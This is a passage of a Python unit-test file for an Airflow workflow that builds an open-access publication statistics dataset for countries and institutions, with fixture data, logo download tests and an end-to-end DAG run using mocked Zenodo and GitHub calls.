patch(mock_clearbit_ref, wraps=download_logo) as mock_clearbit_download:\n actual_ror_id, actual_logo_path = fetch_institution_logo(ror_id, url, size, width, fmt, build_path)\n self.assertEqual(ror_id, actual_ror_id)\n self.assertEqual(\"logo_path\", actual_logo_path)\n mock_clearbit_download.assert_called_once_with(\n company_url=url,\n file_path=\"build_path/images/logos/institution/size/ror_id.fmt\",\n size=width,\n fmt=fmt,\n )\n mock_make_url.assert_called_once_with(entity_type=\"institution\", entity_id=ror_id, size=size, fmt=fmt)\n\n mock_make_url.reset_mock()\n\n # Test when logo file already exists\n with patch(mock_clearbit_ref, wraps=download_logo) as mock_clearbit_download:\n actual_ror_id, actual_logo_path = fetch_institution_logo(ror_id, url, size, width, fmt, build_path)\n self.assertEqual(ror_id, actual_ror_id)\n self.assertEqual(\"logo_path\", actual_logo_path)\n mock_clearbit_download.assert_not_called()\n mock_make_url.assert_called_once_with(entity_type=\"institution\", entity_id=ror_id, size=size, fmt=fmt)\n\n def test_make_entity_stats(self):\n \"\"\"Test make_entity_stats\"\"\"\n\n # Input figures for multiple entities\n p_outputs_open = [100, 50, 30]\n n_outputs = [10, 100, 1000]\n n_outputs_open = [10, 100, 1000]\n entities = [\n Entity(\n \"\",\n \"\",\n Description(\"\", \"\"),\n stats=PublicationStats(\n p_outputs_open=p_outputs_open_, n_outputs=n_outputs_, n_outputs_open=n_outputs_open_\n ),\n )\n for p_outputs_open_, n_outputs_, n_outputs_open_ in zip(p_outputs_open, n_outputs, n_outputs_open)\n ]\n stats = make_entity_stats(entities)\n expected_stats = EntityStats(\n 3,\n min=PublicationStats(p_outputs_open=30.0, n_outputs=10, n_outputs_open=10),\n max=PublicationStats(p_outputs_open=100.0, n_outputs=1000, n_outputs_open=1000),\n median=PublicationStats(p_outputs_open=50),\n histograms=EntityHistograms(\n p_outputs_open=Histogram(data=[2, 0, 1], bins=[30.0, 53.33333333333333, 76.66666666666666, 100.0]),\n n_outputs=Histogram(data=[1, 1, 1], bins=[1.0, 1.6666666666666665, 2.333333333333333, 3.0]),\n n_outputs_open=Histogram(data=[1, 1, 1], bins=[1.0, 1.6666666666666665, 2.333333333333333, 3.0]),\n ),\n )\n self.assertEqual(expected_stats, stats)\n\n\ndef load_index_and_data(entity_type: str, index: List[Dict], data: List[Dict]):\n df_index = pd.DataFrame(index)\n preprocess_index_df(entity_type, df_index)\n\n df_data = pd.DataFrame(data)\n preprocess_data_df(entity_type, df_data)\n\n df_index = make_index_df(entity_type, df_index, df_data)\n\n return df_index, df_data\n\n\nclass TestOaWebWorkflow(ObservatoryTestCase):\n maxDiff = None\n dt_fmt = \"YYYY-MM-DD\"\n\n def setUp(self) -> None:\n \"\"\"TestOaWebWorkflow checks that the workflow functions correctly, i.e. outputs the correct files, but doesn't\n check that the calculations are correct (data correctness is tested in TestOaWebRelease).\"\"\"\n\n # For Airflow unit tests\n self.project_id = os.getenv(\"TEST_GCP_PROJECT_ID\")\n self.data_location = os.getenv(\"TEST_GCP_DATA_LOCATION\")\n self.oa_web_fixtures = \"oa_web_workflow\"\n\n # For testing workflow functions\n self.dag_id = \"oa_web_workflow\"\n self.data_bucket_name = \"data-bucket-name\"\n self.conceptrecid = 1055172\n # self.release = OaWebRelease(dag_id=\"dag\", snapshot_date=pendulum.now(), data_bucket_name=)\n # self.workflow = OaWebWorkflow(dag_id=self.dag_id, input_project_id=self.project_id, output_project_id=self.project_id)\n repositories = [\n {\"id\": \"PubMed Central\", \"total_outputs\": 15, \"category\": \"Domain\", \"home_repo\": False},\n {\"id\": \"Europe PMC\", \"total_outputs\": 12, \"category\": \"Domain\", \"home_repo\": False},\n {\"id\": \"arXiv\", \"total_outputs\": 10, \"category\": \"Preprint\", \"home_repo\": False},\n ]\n self.country_index = [\n {\n \"id\": \"NZL\",\n \"name\": \"New Zealand\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/New_Zealand\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"alpha2\": \"NZ\",\n },\n ]\n # The n_ fields are strings because BigQuery exports integers as strings in JSON Lines exports\n self.country_data = [\n {\n \"id\": \"NZL\",\n \"year\": \"2020\",\n \"n_citations\": \"121\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"48\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"11\",\n \"n_outputs_both\": \"26\",\n \"n_outputs_other_platform_open\": \"37\",\n \"n_outputs_other_platform_open_only\": \"11\",\n \"n_outputs_closed\": \"52\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"19\",\n \"n_outputs_hybrid\": \"10\",\n \"n_outputs_no_guarantees\": \"8\",\n \"n_outputs_preprint\": \"10\",\n \"n_outputs_domain\": \"27\",\n \"n_outputs_institution\": \"0\",\n \"n_outputs_public\": \"0\",\n \"n_outputs_other_internet\": \"0\",\n \"repositories\": repositories,\n },\n {\n \"id\": \"NZL\",\n \"year\": 2021,\n \"n_citations\": \"233\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"45\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"14\",\n \"n_outputs_both\": \"23\",\n \"n_outputs_other_platform_open\": \"31\",\n \"n_outputs_other_platform_open_only\": \"8\",\n \"n_outputs_closed\": \"55\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"20\",\n \"n_outputs_hybrid\": \"9\",\n \"n_outputs_no_guarantees\": \"8\",\n \"n_outputs_preprint\": \"10\",\n \"n_outputs_domain\": \"27\",\n \"n_outputs_institution\": \"0\",\n \"n_outputs_public\": \"0\",\n \"n_outputs_other_internet\": \"0\",\n \"repositories\": repositories,\n },\n ]\n self.institution_index = [\n {\n \"id\": \"https://ror.org/02n415q13\",\n \"name\": \"Curtin University\",\n \"url\": \"https://curtin.edu.au/\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/Curtin_University\",\n \"country_code\": \"AUS\",\n \"country_name\": \"Australia\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"institution_type\": \"Education\",\n \"acronyms\": [],\n },\n ]\n self.institution_data = [\n {\n \"id\": \"https://ror.org/02n415q13\",\n \"year\": 2020,\n \"n_citations\": \"121\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"48\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"11\",\n \"n_outputs_both\": \"26\",\n \"n_outputs_other_platform_open\": \"37\",\n \"n_outputs_other_platform_open_only\": \"11\",\n \"n_outputs_closed\": \"52\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"19\",\n \"n_outputs_hybrid\": \"10\",\n \"n_outputs_no_guarantees\": \"8\",\n \"n_outputs_preprint\": \"10\",\n \"n_outputs_domain\": \"27\",\n \"n_outputs_institution\": \"0\",\n \"n_outputs_public\": \"0\",\n \"n_outputs_other_internet\": \"0\",\n \"repositories\": repositories,\n },\n {\n \"id\": \"https://ror.org/02n415q13\",\n \"year\": 2021,\n \"n_citations\": \"233\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"45\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"14\",\n \"n_outputs_both\": \"23\",\n \"n_outputs_other_platform_open\": \"31\",\n \"n_outputs_other_platform_open_only\": \"8\",\n \"n_outputs_closed\": \"55\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"20\",\n \"n_outputs_hybrid\": \"9\",\n \"n_outputs_no_guarantees\": \"8\",\n \"n_outputs_preprint\": \"10\",\n \"n_outputs_domain\": \"27\",\n \"n_outputs_institution\": \"0\",\n \"n_outputs_public\": \"0\",\n \"n_outputs_other_internet\": \"0\",\n \"repositories\": repositories,\n },\n ]\n self.entities = [\n (\"country\", self.country_index, self.country_data, [\"NZL\"]),\n (\"institution\", self.institution_index, self.institution_data, [\"02n415q13\"]),\n ]\n\n ####################################\n # Test workflow with Airflow\n ####################################\n\n def test_dag_structure(self):\n \"\"\"Test that the DAG has the correct structure.\"\"\"\n\n env = ObservatoryEnvironment(enable_api=False)\n with env.create():\n dag = OaWebWorkflow(\n dag_id=self.dag_id,\n cloud_workspace=env.cloud_workspace,\n data_bucket=self.data_bucket_name,\n conceptrecid=self.conceptrecid,\n ).make_dag()\n self.assert_dag_structure(\n {\n \"doi_sensor\": [\"check_dependencies\"],\n \"check_dependencies\": [\"query\"],\n \"query\": [\"download\"],\n \"download\": [\"make_draft_zenodo_version\"],\n \"make_draft_zenodo_version\": [\"download_assets\"],\n \"download_assets\": [\"preprocess_data\"],\n \"preprocess_data\": [\"build_indexes\"],\n \"build_indexes\": [\"download_logos\"],\n \"download_logos\": [\"download_wiki_descriptions\"],\n \"download_wiki_descriptions\": [\"build_datasets\"],\n \"build_datasets\": [\"publish_zenodo_version\"],\n \"publish_zenodo_version\": [\"upload_dataset\"],\n \"upload_dataset\": [\"repository_dispatch\"],\n \"repository_dispatch\": [\"cleanup\"],\n \"cleanup\": [],\n },\n dag,\n )\n\n def test_dag_load(self):\n \"\"\"Test that the DAG can be loaded from a DAG bag.\"\"\"\n\n # Test successful\n env = ObservatoryEnvironment(\n workflows=[\n Workflow(\n dag_id=self.dag_id,\n name=\"Open Access Website Workflow\",\n class_name=\"academic_observatory_workflows.workflows.oa_web_workflow.OaWebWorkflow\",\n cloud_workspace=self.fake_cloud_workspace,\n kwargs=dict(\n data_bucket=self.data_bucket_name,\n conceptrecid=self.conceptrecid,\n ),\n )\n ]\n )\n\n with env.create():\n self.assert_dag_load_from_config(self.dag_id)\n\n # Test required kwargs\n env = ObservatoryEnvironment(\n workflows=[\n Workflow(\n dag_id=self.dag_id,\n name=\"Open Access Website Workflow\",\n class_name=\"academic_observatory_workflows.workflows.oa_web_workflow.OaWebWorkflow\",\n cloud_workspace=self.fake_cloud_workspace,\n kwargs=dict(),\n )\n ]\n )\n\n with env.create():\n with self.assertRaises(AssertionError) as cm:\n self.assert_dag_load_from_config(self.dag_id)\n msg = cm.exception.args[0]\n self.assertTrue(\"missing 2 required keyword-only arguments\" in msg)\n self.assertTrue(\"data_bucket\" in msg)\n self.assertTrue(\"conceptrecid\" in msg)\n\n def setup_tables(\n self, dataset_id_all: str, dataset_id_settings: str, bucket_name: str, snapshot_date: pendulum.DateTime\n ):\n ror = load_jsonl(test_fixtures_folder(\"doi\", \"ror.jsonl\"))\n country = load_jsonl(test_fixtures_folder(self.oa_web_fixtures, \"country.jsonl.gz\"))\n institution = load_jsonl(test_fixtures_folder(self.oa_web_fixtures, \"institution.jsonl.gz\"))\n settings_country = load_jsonl(test_fixtures_folder(\"doi\", \"country.jsonl\"))\n\n oa_web_schema_path = test_fixtures_folder(self.oa_web_fixtures, \"schema\")\n with CliRunner().isolated_filesystem() as t:\n tables = [\n Table(\n \"ror\",\n True,\n dataset_id_all,\n ror,\n bq_find_schema(\n path=os.path.join(schema_folder(), \"ror\"), table_name=\"ror\", release_date=snapshot_date\n ),\n ),\n Table(\n \"country\",\n True,\n dataset_id_all,\n country,\n bq_find_schema(path=oa_web_schema_path, table_name=\"country\"),\n ),\n Table(\n \"institution\",\n True,\n dataset_id_all,\n institution,\n bq_find_schema(path=oa_web_schema_path, table_name=\"institution\"),\n ),\n Table(\n \"country\",\n False,\n dataset_id_settings,\n settings_country,\n bq_find_schema(path=os.path.join(schema_folder(), \"doi\"), table_name=\"country\"),\n ),\n ]\n\n bq_load_tables(\n project_id=self.project_id,\n tables=tables,\n bucket_name=bucket_name,\n snapshot_date=snapshot_date,\n )\n\n @patch(\"academic_observatory_workflows.workflows.oa_web_workflow.Zenodo\")\n @patch(\"academic_observatory_workflows.workflows.oa_web_workflow.trigger_repository_dispatch\")\n def test_telescope(self, mock_trigger_repository_dispatch, mock_zenodo):\n \"\"\"Test the telescope end to end.\"\"\"\n\n mock_zenodo.return_value = MockZenodo()\n execution_date = pendulum.datetime(2021, 11, 14)\n snapshot_date = pendulum.datetime(2021, 11, 21)\n env = ObservatoryEnvironment(project_id=self.project_id, data_location=self.data_location, enable_api=False)\n bq_dataset_id = env.add_dataset(\"data\")\n bq_dataset_id_settings = env.add_dataset(\"settings\")\n data_bucket = env.add_bucket()\n github_token = \"github-token\"\n zenodo_token = \"zenodo-token\"\n\n with env.create() as t:\n # Run fake DOI workflow to test sensor\n dag = make_dummy_dag(\"doi\", execution_date)\n with env.create_dag_run(dag, execution_date):\n # Running all of a DAGs tasks sets the DAG to finished\n ti = env.run_task(\"dummy_task\")\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Setup dependencies\n # Upload fake data to BigQuery\n self.setup_tables(\n dataset_id_all=bq_dataset_id,\n dataset_id_settings=bq_dataset_id_settings,\n bucket_name=env.download_bucket,\n snapshot_date=snapshot_date,\n )\n\n # Upload fake cached zip files file to bucket\n for file_name in [\"images-base.zip\", \"images.zip\"]:\n file_path = test_fixtures_folder(\"oa_web_workflow\", file_name)\n gcs_upload_file(bucket_name=data_bucket, blob_name=file_name, file_path=file_path)\n\n # Setup workflow and connections\n workflow = OaWebWorkflow(\n dag_id=self.dag_id,\n cloud_workspace=env.cloud_workspace,\n data_bucket=data_bucket,\n conceptrecid=self.conceptrecid,\n bq_ror_dataset_id=bq_dataset_id,\n bq_agg_dataset_id=bq_dataset_id,\n bq_settings_dataset_id=bq_dataset_id_settings,\n )\n dag = workflow.make_dag()\n env.add_connection(Connection(conn_id=workflow.github_conn_id, uri=f\"http://:{github_token}@\"))\n env.add_connection(Connection(conn_id=workflow.zenodo_conn_id, uri=f\"http://:{zenodo_token}@\"))\n\n # Run workflow\n with env.create_dag_run(dag, execution_date) as dag_run:\n # Mocked and expected data\n release = OaWebRelease(\n dag_id=self.dag_id,\n run_id=dag_run.run_id,\n snapshot_date=snapshot_date,\n )\n\n # DOI Sensor\n ti = env.run_task(\"doi_sensor\")\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Check dependencies\n ti = env.run_task(workflow.check_dependencies.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Run query\n ti = env.run_task(workflow.query.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Download data\n ti = env.run_task(workflow.download.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n expected_file_names = [\n \"country-index.jsonl.gz\",\n \"institution-index.jsonl.gz\",\n \"country-data-000000000000.jsonl.gz\",\n \"institution-data-000000000000.jsonl.gz\",\n ]\n for file_name in expected_file_names:\n path = os.path.join(release.download_folder, file_name)\n self.assertTrue(os.path.isfile(path))\n\n # Make draft Zenodo version\n ti = env.run_task(workflow.make_draft_zenodo_version.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Download cached assets\n ti = env.run_task(workflow.download_assets.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n expected_file_names = [\n \"images.zip\",\n \"images-base.zip\",\n ]\n for file_name in expected_file_names:\n path = os.path.join(release.download_folder, file_name)\n self.assertTrue(os.path.isfile(path))\n\n # Preprocess data\n ti = env.run_task(workflow.preprocess_data.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n expected_file_names = [\n \"country-data.jsonl.gz\",\n \"institution-data.jsonl.gz\",\n ]\n for file_name in expected_file_names:\n path = os.path.join(release.transform_folder, \"intermediate\", file_name)\n self.assertTrue(os.path.isfile(path))\n\n # Build indexes\n ti = env.run_task(workflow.build_indexes.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n expected_file_names = [\n \"country-index.jsonl.gz\",\n \"institution-index.jsonl.gz\",\n ]\n for file_name in expected_file_names:\n path = os.path.join(release.transform_folder, \"intermediate\", file_name)\n self.assertTrue(os.path.isfile(path))\n\n # Download logos\n ti = env.run_task(workflow.download_logos.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Download wiki descriptions\n ti = env.run_task(workflow.download_wiki_descriptions.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Build datasets\n ti = env.run_task(workflow.build_datasets.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n build_folder = os.path.join(release.transform_folder, \"build\")\n expected_files = make_expected_build_files(build_folder)\n print(\"Checking expected transformed files\")\n for file in expected_files:\n print(f\"\\t{file}\")\n self.assertTrue(os.path.isfile(file))\n\n # Check that full dataset zip file exists\n archives = [\"data.zip\", \"images.zip\", \"coki-oa-dataset.zip\"]\n for file_name in archives:\n latest_file = os.path.join(release.transform_folder, \"out\", file_name)\n print(f\"\\t{latest_file}\")\n self.assertTrue(os.path.isfile(latest_file))\n\n # Publish Zenodo version\n ti = env.run_task(workflow.publish_zenodo_version.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Upload data to bucket\n ti = env.run_task(workflow.upload_dataset.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n blob_name = f\"{workflow.version}/data.zip\"\n self.assert_blob_exists(data_bucket, blob_name)\n blob_name = f\"{workflow.version}/images.zip\"\n self.assert_blob_exists(data_bucket, blob_name)\n\n # Trigger repository dispatch\n ti = env.run_task(workflow.repository_dispatch.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n mock_trigger_repository_dispatch.called_once_with(github_token, \"data-update/develop\")\n mock_trigger_repository_dispatch.called_once_with(github_token, \"data-update/staging\")\n mock_trigger_repository_dispatch.called_once_with(github_token, \"data-update/production\")\n\n # Test that all workflow data deleted\n ti = env.run_task(workflow.cleanup.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n self.assert_cleanup(release.workflow_folder)\n\n ####################################\n # Test workflow functions\n ####################################\n\n def save_mock_data(self, path: str, test_data):\n with jsonlines.open(path, mode=\"w\") as writer:\n writer.write_all(test_data)\n df = pd.DataFrame(test_data)\n return df\n\n def test_load_data_glob(self):\n with CliRunner().isolated_filesystem() as t:\n path = os.path.join(t, \"data-000000000000.jsonl.gz\")\n save_jsonl_gz(path, [{\"name\": \"Jim\"}, {\"name\": \"David\"}, {\"name\": \"Jane\"}])\n\n path = os.path.join(t, \"data-000000000001.jsonl.gz\")\n save_jsonl_gz(path, [{\"name\": \"Joe\"}, {\"name\": \"Blogs\"}, {\"name\": \"Daniels\"}])\n\n # Compare\n expected = [\n {\"name\": \"Jim\"},\n {\"name\": \"David\"},\n {\"name\": \"Jane\"},\n {\"name\": \"Joe\"},\n {\"name\": \"Blogs\"},\n {\"name\": \"Daniels\"},\n ]\n\n actual = load_data_glob(os.path.join(t, \"data-*.jsonl.gz\"))\n self.assertEqual(expected, actual)\n\n def test_load_data(self):\n entity_type = \"country\"\n with CliRunner().isolated_filesystem() as t:\n # Save Data\n path = os.path.join(t, f\"{entity_type}-index.jsonl\")\n df = self.save_mock_data(path, self.country_index)\n\n # Load csv\n actual_df = load_data(path)\n\n # Compare\n expected_countries = df.to_dict(\"records\")\n actual_countries = actual_df.to_dict(\"records\")\n self.assertEqual(expected_countries, actual_countries)\n\n def test_update_df_with_percentages(self):\n keys = [(\"hello\", \"n_outputs\"), (\"world\", \"n_outputs\")]\n df = pd.DataFrame([{\"n_hello\": 20, \"n_world\": 50, \"n_outputs\": 100}])\n update_df_with_percentages(df, keys)\n expected = {\"n_hello\": 20, \"n_world\": 50, \"n_outputs\": 100, \"p_hello\": 20, \"p_world\": 50}\n actual = df.to_dict(orient=\"records\")[0]\n self.assertEqual(expected, actual)\n\n def test_make_index_df(self):\n with CliRunner().isolated_filesystem() as t:\n # Country\n entity_type = \"country\"\n df_index, df_data = load_index_and_data(entity_type, self.country_index, self.country_data)\n\n expected = [\n {\n \"alpha2\": \"NZ\",\n \"entity_type\": \"country\",\n \"id\": \"NZL\",\n \"name\": \"New Zealand\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/New_Zealand\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"n_citations\": 354,\n \"n_outputs\": 200,\n \"n_outputs_open\": 93,\n \"n_outputs_publisher_open\": 74,\n \"n_outputs_publisher_open_only\": 25,\n \"n_outputs_both\": 49,\n \"n_outputs_other_platform_open\": 68,\n \"n_outputs_other_platform_open_only\": 19,\n \"n_outputs_closed\": 107,\n \"n_outputs_black\": 180.0,\n \"n_outputs_oa_journal\": 39,\n \"n_outputs_hybrid\": 19,\n \"n_outputs_no_guarantees\": 16,\n \"n_outputs_preprint\": 20,\n \"n_outputs_domain\": 54,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 46.5,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 12.5,\n \"p_outputs_both\": 24.5,\n \"p_outputs_other_platform_open\": 34.0,\n \"p_outputs_other_platform_open_only\": 9.5,\n \"p_outputs_closed\": 53.5,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 52.702702702702695,\n \"p_outputs_hybrid\": 25.675675675675674,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 29.411764705882355,\n \"p_outputs_domain\": 79.41176470588235,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n }\n ]\n print(\"Checking country records:\")\n actual = df_index.to_dict(\"records\")\n for e, a in zip(expected, actual):\n self.assertDictEqual(e, a)\n\n # Institution\n entity_type = \"institution\"\n df_index, df_data = load_index_and_data(entity_type, self.institution_index, self.institution_data)\n expected = [\n {\n \"entity_type\": \"institution\",\n \"id\": \"02n415q13\",\n \"name\": \"Curtin University\",\n \"url\": \"https://curtin.edu.au/\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/Curtin_University\",\n \"country_code\": \"AUS\",\n \"country_name\": \"Australia\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"institution_type\": \"Education\",\n \"n_citations\": 354,\n \"n_outputs\": 200,\n \"n_outputs_open\": 93,\n \"n_outputs_publisher_open\": 74,\n \"n_outputs_publisher_open_only\": 25,\n \"n_outputs_both\": 49,\n \"n_outputs_other_platform_open\": 68,\n \"n_outputs_other_platform_open_only\": 19,\n \"n_outputs_closed\": 107,\n \"n_outputs_black\": 180,\n \"n_outputs_oa_journal\": 39,\n \"n_outputs_hybrid\": 19,\n \"n_outputs_no_guarantees\": 16,\n \"n_outputs_preprint\": 20,\n \"n_outputs_domain\": 54,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 46.5,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 12.5,\n \"p_outputs_both\": 24.5,\n \"p_outputs_other_platform_open\": 34.0,\n \"p_outputs_other_platform_open_only\": 9.5,\n \"p_outputs_closed\": 53.5,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 52.702702702702695,\n \"p_outputs_hybrid\": 25.675675675675674,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 29.411764705882355,\n \"p_outputs_domain\": 79.41176470588235,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n \"acronyms\": [],\n }\n ]\n\n print(\"Checking institution records:\")\n actual = df_index.to_dict(\"records\")\n for e, a in zip(expected, actual):\n self.assertDictEqual(e, a)\n\n def test_update_index_with_logos(self):\n with CliRunner().isolated_filesystem() as t:\n sizes = [\"sm\", \"md\", \"lg\"]\n\n # Country table\n entity_type = \"country\"\n df_index, _ = load_index_and_data(entity_type, self.country_index, self.country_data)\n update_index_with_logos(t, entity_type, df_index)\n\n for i, row in df_index.iterrows():\n for size in sizes:\n # Check that logo key created\n key = f\"logo_{size}\"\n self.assertTrue(key in row)\n\n # Redirect to md size\n if size == \"lg\":\n size = \"md\"\n\n # Check that correct logo path exists\n item_id = row[\"id\"]\n expected_path = f\"logos/{entity_type}/{size}/{item_id}.svg\"\n actual_path = row[key]\n self.assertEqual(expected_path, actual_path)\n\n # Institution table\n entity_type = \"institution\"\n institution_index = self.institution_index + [\n {\n \"id\": \"https://ror.org/12345\",\n \"name\": \"Foo University\",\n \"country_name\": \"Australia\",\n \"country_code\": \"AUS\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"url\": None,\n \"wikipedia_url\": None,\n \"institution_type\": \"Education\",\n }\n ]\n institution_data = self.institution_data + [\n {\n \"id\": \"https://ror.org/12345\",\n \"year\": 2020,\n \"n_citations\": \"121\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"48\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"11\",\n \"n_outputs_both\": \"26\",\n \"n_outputs_other_platform_open\": \"37\",\n \"n_outputs_other_platform_open_only\": \"11\",\n \"n_outputs_closed\": \"52\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"19\",\n \"n_outputs_hybrid\": \"10\",\n \"n_outputs_no_guarantees\": \"8\",\n },\n ]\n\n # Create index\n df_index, _ = load_index_and_data(entity_type, institution_index, institution_data)\n sizes = [\"sm\", \"md\", \"lg\"]\n with vcr.use_cassette(test_fixtures_folder(\"oa_web_workflow\", \"test_make_logos.yaml\")):\n df_index = update_index_with_logos(t, entity_type, df_index)\n curtin_row = df_index[df_index[\"id\"] == \"02n415q13\"].iloc[0]\n foo_row = df_index[df_index[\"id\"] == \"12345\"].iloc[0]\n for size in sizes:\n # Check that logo was added to dataframe\n key = f\"logo_{size}\"\n self.assertTrue(key in curtin_row)\n self.assertTrue(key in foo_row)\n\n # Check that correct path created\n item_id = curtin_row[\"id\"]\n fmt = \"jpg\"\n if size == \"lg\":\n fmt = \"png\"\n expected_curtin_path = f\"logos/{entity_type}/{size}/{item_id}.{fmt}\"\n expected_foo_path = f\"unknown.svg\"\n self.assertEqual(expected_curtin_path, curtin_row[key])\n self.assertEqual(expected_foo_path, foo_row[key])\n\n # Check that downloaded logo exists\n full_path = os.path.join(t, \"images\", expected_curtin_path)\n self.assertTrue(os.path.isfile(full_path))\n\n def test_save_index_df(self):\n with CliRunner().isolated_filesystem() as t:\n for entity_type, index, data, entity_ids in self.entities:\n # Load index\n df_index = pd.DataFrame(index)\n preprocess_index_df(entity_type, df_index)\n\n # Load data\n df_data = pd.DataFrame(data)\n preprocess_data_df(entity_type, df_data)\n\n # Make index\n df_index = make_index_df(entity_type, df_index, df_data)\n update_index_with_logos(t, entity_type, df_index)\n\n # Make entities\n entities = make_entities(entity_type, df_index, df_data)\n\n # Save index from entities\n data_path = os.path.join(t, \"data\")\n os.makedirs(data_path, exist_ok=True)\n file_path = os.path.join(data_path, f\"{entity_type}.json\")\n data = make_index(entity_type, entities)\n save_json(file_path, data)\n self.assertTrue(os.path.isfile(file_path))\n\n def test_make_entities(self):\n with CliRunner().isolated_filesystem() as t:\n # Country\n entity_type = \"country\"\n\n # Load index\n df_index = pd.DataFrame(self.country_index)\n preprocess_index_df(entity_type, df_index)\n\n # Load data\n df_data = pd.DataFrame(self.country_data)\n preprocess_data_df(entity_type, df_data)\n\n # Make index and entities\n df_index = make_index_df(entity_type, df_index, df_data)\n entities = make_entities(entity_type, df_index, df_data)\n\n repositories = [\n {\"id\": \"PubMed Central\", \"total_outputs\": 30, \"category\": \"Domain\", \"home_repo\": False},\n {\"id\": \"Europe PMC\", \"total_outputs\": 24, \"category\": \"Domain\", \"home_repo\": False},\n {\"id\": \"arXiv\", \"total_outputs\": 20, \"category\": \"Preprint\", \"home_repo\": False},\n ]\n expected = [\n {\n \"id\": \"NZL\",\n \"name\": \"New Zealand\",\n \"entity_type\": entity_type,\n \"description\": {\n \"license\": Description.license,\n \"text\": None,\n \"url\": \"https://en.wikipedia.org/wiki/New_Zealand\",\n },\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/New_Zealand\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"end_year\": 2021,\n \"start_year\": 2020,\n \"stats\": {\n \"n_citations\": 354,\n \"n_outputs\": 200,\n \"n_outputs_open\": 93,\n \"n_outputs_publisher_open\": 74,\n \"n_outputs_publisher_open_only\": 25,\n \"n_outputs_both\": 49,\n \"n_outputs_other_platform_open\": 68,\n \"n_outputs_other_platform_open_only\": 19,\n \"n_outputs_closed\": 107,\n \"n_outputs_black\": 180,\n \"n_outputs_oa_journal\": 39,\n \"n_outputs_hybrid\": 19,\n \"n_outputs_no_guarantees\": 16,\n \"n_outputs_preprint\": 20,\n \"n_outputs_domain\": 54,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 46.5,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 12.5,\n \"p_outputs_both\": 24.5,\n \"p_outputs_other_platform_open\": 34.0,\n \"p_outputs_other_platform_open_only\": 9.5,\n \"p_outputs_closed\": 53.5,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 52.702702702702695,\n \"p_outputs_hybrid\": 25.675675675675674,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 29.411764705882355,\n \"p_outputs_domain\": 79.41176470588235,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n \"years\": [\n {\n \"year\": 2020,\n \"date\": \"2020-12-31\",\n \"stats\": {\n \"n_citations\": 121,\n \"n_outputs\": 100,\n \"n_outputs_open\": 48,\n \"n_outputs_publisher_open\": 37,\n \"n_outputs_publisher_open_only\": 11,\n \"n_outputs_both\": 26,\n \"n_outputs_other_platform_open\": 37,\n \"n_outputs_other_platform_open_only\": 11,\n 